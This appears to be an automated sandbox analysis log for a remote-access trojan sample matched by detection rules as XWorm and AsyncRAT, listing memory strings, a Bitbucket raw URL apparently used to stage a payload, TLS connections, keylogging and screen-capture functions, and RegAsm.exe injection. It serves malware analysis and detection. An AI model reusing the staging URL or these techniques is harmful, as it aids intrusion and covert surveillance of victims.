Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000003.1030481717.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114745308.000000000095B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114654116.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000003.1114331855.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.1458583330.0000000000650000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000002.1459004700.0000000000650000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas
Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000002.1030719769.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.
Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000003.1030481717.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114745308.000000000095B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000003.1114331855.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114654116.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paasg
Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000003.1030481717.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114745308.000000000095B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114654116.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000003.1114331855.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000003.1030481717.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114745308.000000000095B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114654116.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000003.1114331855.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.913107196.0000000000673000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000002.1459004700.000000000065D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000002.1030800082.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000003.1030481717.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114745308.000000000095B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000003.1114331855.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.913107196.0000000000673000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000002.1459004700.000000000065D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000002.1030800082.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000003.1030481717.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114745308.000000000095B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000003.1114331855.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.913107196.0000000000673000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000002.1459004700.000000000065D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000002.1030800082.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000003.1030481717.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114745308.000000000095B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000003.1114331855.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000002.1030800082.0000000000B0D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114745308.0000000000920000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000003.1114331855.000000000091F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/
Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000002.1458891957.0000000000637000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.1458583330.0000000000650000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000002.1458891957.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000002.1459004700.0000000000650000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000002.1030719769.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000003.1030481717.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000002.1030800082.0000000000B0D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000002.1030719769.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114745308.0000000000920000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000003.1114331855.000000000091F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114654116.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114654116.000000000090D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/riskwca/cscacxxxc/raw/52d52529adfd79ed3c245e8a5cbeec06b7e5e45d/sdcsdcecd
Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114745308.0000000000920000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000003.1114331855.000000000091F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/riskwca/cscacxxxc/raw/52d52529adfd79ed3c245e8a5cbeec06b7e5e45d/sdcsdcecd:y
Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114654116.000000000090D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/riskwca/cscacxxxc/raw/52d52529adfd79ed3c245e8a5cbeec06b7e5e45d/sdcsdcecdu
Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000002.1458891957.0000000000637000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/riskwca/cscacxxxc/raw/52d52529adfd79ed3c245e8a5cbeec06b7e5e45d/sdcsdcecdvHe
Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.913163581.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.1458583330.0000000000650000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.913107196.0000000000673000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000002.1459004700.000000000065D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000002.1459004700.0000000000650000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000002.1030800082.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000002.1030719769.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000003.1030481717.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114745308.000000000095B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114654116.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000003.1114331855.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cookielaw.org/
Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.913163581.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.913107196.0000000000673000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000003.1114270198.000000000096D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000003.1114293805.0000000000977000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.913163581.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.913107196.0000000000673000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000002.1030800082.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000003.1030481717.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.913163581.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.913107196.0000000000673000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000002.1030800082.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000003.1030481717.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.913163581.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.913107196.0000000000673000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49683
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49682
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49681
Source: unknown	Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49682 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49681 -> 443

Source: unknown	HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.8:49682 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49683 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.8:49685 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.8:49692 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: 3.2.RegAsm.exe.7b00000.1.raw.unpack, RemoteDesktop.cs

.Net Code: GetScreen

Contains functionality to log keystrokes (.Net Source)

Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Window created: window name: CLIPBRDWNDCLASS

Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b729c0.4.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b729c0.4.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.6.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.6.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.2.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.4.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.4.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.7.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.7.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000003.00000002.1453808203.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000004.00000003.1030380383.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000003.1458491567.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000003.1458491567.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000003.1458718699.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000007.00000003.1114239427.0000000000995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: 0_2_002D51B0	0_2_002D51B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: 0_2_002D3240	0_2_002D3240
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: 0_2_002E63F0	0_2_002E63F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: 0_2_002DE460	0_2_002DE460
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: 0_2_002EC65A	0_2_002EC65A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: 0_2_002E6750	0_2_002E6750
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: 0_2_002D67A0	0_2_002D67A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: 0_2_002DC8E7	0_2_002DC8E7
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: 2_2_00CD51B0	2_2_00CD51B0
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: 2_2_00CD3240	2_2_00CD3240
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: 2_2_00CE63F0	2_2_00CE63F0
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: 2_2_00CDE460	2_2_00CDE460
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: 2_2_00CEC65A	2_2_00CEC65A
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: 2_2_00CD67A0	2_2_00CD67A0
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: 2_2_00CE6750	2_2_00CE6750
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: 2_2_00CDC8E7	2_2_00CDC8E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_053173C8	3_2_053173C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_05317F48	3_2_05317F48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_053169F0	3_2_053169F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_053164A0	3_2_053164A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_05318AB0	3_2_05318AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0674F6C8	3_2_0674F6C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_06746AE0	3_2_06746AE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_067483B0	3_2_067483B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0674B3B0	3_2_0674B3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_06742268	3_2_06742268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_07B200E0	3_2_07B200E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_07B29ED8	3_2_07B29ED8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_07B200D2	3_2_07B200D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_07B29EC9	3_2_07B29EC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_07B2C8BA	3_2_07B2C8BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_07BF04D0	3_2_07BF04D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_07BF04C0	3_2_07BF04C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_07BF0040	3_2_07BF0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_07B2C8C8	3_2_07B2C8C8

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: String function: 002D5600 appears 55 times
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: String function: 00CD5600 appears 55 times

Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.1458491567.00000000006D1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient031225.exe4 vs SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe
Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.1458718699.00000000006D1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient031225.exe4 vs SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe
Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.1458491567.00000000006AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient031225.exe4 vs SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe
Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000003.1030380383.0000000000B73000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient031225.exe4 vs SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe
Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000003.1114239427.0000000000995000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient031225.exe4 vs SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe

Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
